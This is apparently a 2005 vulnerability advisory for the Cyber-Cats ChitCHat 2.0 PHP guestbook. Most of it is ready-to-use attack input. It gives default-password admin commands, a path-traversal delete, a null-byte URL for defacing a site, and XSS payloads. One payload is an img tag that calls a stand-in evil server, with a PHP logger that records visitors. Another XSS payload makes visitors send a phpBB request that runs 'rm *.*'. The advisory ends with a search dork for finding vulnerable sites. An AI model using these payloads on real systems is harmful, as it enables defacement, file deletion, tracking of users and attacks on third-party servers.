Cyber-Cats ChitCHat 2.0 permits cross site scripting attacks,
lets users launch exploits from, lets remote users obtain informations
on target users, lets insecurely delete/create files

software:
site: http://www.cyber-cats.com/php/


1) this software use a system of cheatcodes (they are well explained inside the
chitchat.php code) to administrate guestbook, yuo can use them in message body.
The problem is the default password "admin", so you can use these commands:

command::admin::change password::[new password]

command::admin::delete::[an archive filename without extension]
(archive are organized by date, now is 04/09/2005, so if admin choosed
year-month-day archiviation, actual filename is 050904.txt)

command::admin::add ip::[ip address]
(to add an ip to ban list)

command::admin::remove ip::[ip address]

command::admin::list ips::

command::admin::add word::[a word]
(to add a word to censored list)

command::admin::remove word::[a word]
command::admin::list words

so a user can easily change password, it is one way encrypted..., so an admin
has to reinstall board or change it in passwd.txt, you can use this to encrypt
a new password:

<?php
$apassword='newpassword';
crypt($apassword,MW);
echo $apassword;
?>

2) archive filenames are not well filtered when you use the delete cheatcode, so
you can traverse directories:

command::admin::delete::../../[some_textfilename_without_extension]

(you cannot change .txt estension...)

example, to delete data.txt file:
command::admin::delete::../data


3) unsecure file creation:
you cannot overwrite files but you can create an empty file around the system with
the extension you want using null char

http://[target]/chitchat/chitchat_mainpage.php?archive_file=../../../index.html%00

if site main page is an index.php you have defaced it


4) cross site scripting:

in website field type:

"><script>alert("lol")</script>

so a user can log guestbook activity, example:

"><img src="http://[evil_server]/script.php">

where script php is:

<?php
 $log="log".date("Ymd").".txt";
 $fp=fopen($log,'a');
 fputs($fp,$REMOTE_ADDR.":".$REMOTE_PORT." - ".$HTTP_USER_AGENT."-".$HTTP_REFERER."-".$REQUEST_METHOD."-".$QUERY_STRING."-".$HTTP_ACCEPT_LANGUAGE."-".$REQUEST_URI."\r\n");
 fclose($fp)
?>

also a user can make that other users launch exploit for him, example al old phpBB:

"><img src="http://[vulnerable_server]/phpBB/t=1&highlight='.system('rm *.*').'">

when a user open the page, he launches the exploit url GET request

googledorks: inurl:chitchat.php "choose graphic"

rgod
site: http://rgod.altervista.org
mail: retrogod@aliceposta.it